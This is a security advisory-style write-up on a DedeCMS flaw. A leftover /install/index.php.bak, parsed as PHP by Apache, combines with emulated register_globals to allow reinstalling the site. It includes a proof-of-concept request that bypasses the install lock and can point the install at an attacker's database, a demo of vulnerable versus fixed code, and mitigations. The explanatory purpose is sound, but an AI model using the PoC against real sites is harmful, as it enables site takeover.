dedecms /install/index.php.bak Installation File Not Deleted && Executed Via Apache Analytic Vul

catalog

1. Vulnerability Description
2. Trigger Conditions
3. Affected Scope
4. Code Analysis
5. Mitigation
6. Attack and Defense Thoughts

1. Vulnerability Description

A brief summary of how this vulnerability arises:

1. By default, after a DedeCMS installation completes, the install directory is not deleted; the installation script still exists, merely renamed to index.php.bak
//After installation, DedeCMS backs up the install file /install/index.php as /install/index.php.bak
2. Apache has a parsing issue: it walks a file's extensions one by one until it matches a suffix that it has a handler for (ext handler)
//For example, index.php.bak is parsed as index.php
3. DedeCMS widely uses a simulated implementation of "local variable registration" (register_globals), i.e.
/*
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}
*/
This lets an attacker change the normal control flow by supplying specific key variables in the request, bypassing DedeCMS's "already installed" check and achieving a reinstall

Relevant Link:

http://zhanzhang.anquan.org/vul-detail/51b19a3ff159c80f0ab0b8a1/

2. Trigger Conditions

1. The install folder exists
2. Apache multi-extension parsing issue

0x1: POC

http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4
POST: step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&
//dbhost can be pointed at a remote attacker-controlled database, hijacking the installation

3. Affected Scope
4. Code Analysis

/install/index.php.bak

..
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}

require_once(DEDEINC.'/common.func.php');

//Through local variable injection the attacker overwrites the value of $insLockfile, bypassing Dede's check
if(file_exists($insLockfile))
{
    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}
..

Relevant Link:

http://www.cnseay.com/2956/

5. Mitigation

1. Delete the install folder
or
2. Delete /install/index.php.bak
3. Keep the reinstall feature available to users, but fix index.php.bak

/install/index.php.bak

if( file_exists(dirname(__FILE__).'/install_lock.txt') )
{
    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}
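An added PHP example (not DedeCMS's own code) that reproduces the variable-registration loop from the analysis in section 4 beside the fixed check from section 5, showing why the first is bypassable and the second is not. RunMagicQuotes is a hypothetical stand-in, the $_GET contents are constructed to mirror the PoC query string, and it assumes a writable script directory when run from the CLI.

```php
<?php
// Constructed request mirroring the PoC: ?insLockfile=1&step=4
$_GET = ['insLockfile' => '1', 'step' => '4'];

// Hypothetical stand-in for DedeCMS's RunMagicQuotes(); only escapes strings.
function RunMagicQuotes($v)
{
    return is_array($v) ? $v : addslashes($v);
}

// Vulnerable check: the lock path lives in a variable that the registration
// loop can overwrite. Superglobals cannot be reached via $$name inside a
// function, so $GLOBALS[$_request] stands in for the script's $$_request.
function vulnerableLockCheck(): bool
{
    $insLockfile = __DIR__ . '/install_lock.txt';
    foreach (['_GET', '_POST', '_COOKIE'] as $_request) {
        foreach ($GLOBALS[$_request] ?? [] as $_k => $_v) {
            ${$_k} = RunMagicQuotes($_v);   // ?insLockfile=1 turns $insLockfile into "1"
        }
    }
    return file_exists($insLockfile);        // now tests for a file named "1", not the lock
}

// Hardened check (the fix from section 5): the path is computed inline at the
// if, so no request parameter can influence which file is tested.
function hardenedLockCheck(): bool
{
    foreach (['_GET', '_POST', '_COOKIE'] as $_request) {
        foreach ($GLOBALS[$_request] ?? [] as $_k => $_v) {
            ${$_k} = RunMagicQuotes($_v);
        }
    }
    return file_exists(__DIR__ . '/install_lock.txt');
}

// Demo: create the lock file, then see which check still honours it.
$lock = __DIR__ . '/install_lock.txt';   // needs a writable script directory
touch($lock);
printf("vulnerable check sees lock: %s\n", var_export(vulnerableLockCheck(), true));
printf("hardened check sees lock:   %s\n", var_export(hardenedLockCheck(), true));
unlink($lock);
```

With the lock file present, only the hardened check reports it; the vulnerable one is defeated by the single query parameter.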

6. Attack and Defense Thoughts

At the key if checks in code, avoid depending on variables where a fixed value will do; this largely prevents local variable overwrite from letting an attacker inject changes into the control flow

Copyright (c) 2015 LittleHann All rights reserved

Time: 2024-10-10 22:12:12
